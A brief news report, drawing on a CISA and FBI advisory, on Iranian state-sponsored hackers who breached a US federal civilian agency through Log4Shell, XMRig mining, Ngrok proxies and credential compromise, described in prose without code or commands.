Iran’s hackers targeted the US FCEB. The APT exploited the Log4Shell vulnerability, installed XMRig, moved laterally to the domain controller (DC), compromised credentials, and implanted Ngrok reverse proxies

Iran state-sponsored hackers have targeted the US Federal Civilian Executive Branch (FCEB). The Cybersecurity & Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) denounced it. The APT exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. Once they established a deep foothold in the network and moved laterally to the domain controller, they executed a PowerShell command on the Active Directory to obtain a list of all machines attached to the domain. They also changed the password for the local administrator account on several hosts as a backup should the rogue domain administrator account get detected and terminated. Additionally, the APT attempted in vain to dump the Local Security Authority Subsystem Service (LSASS) process with task manager.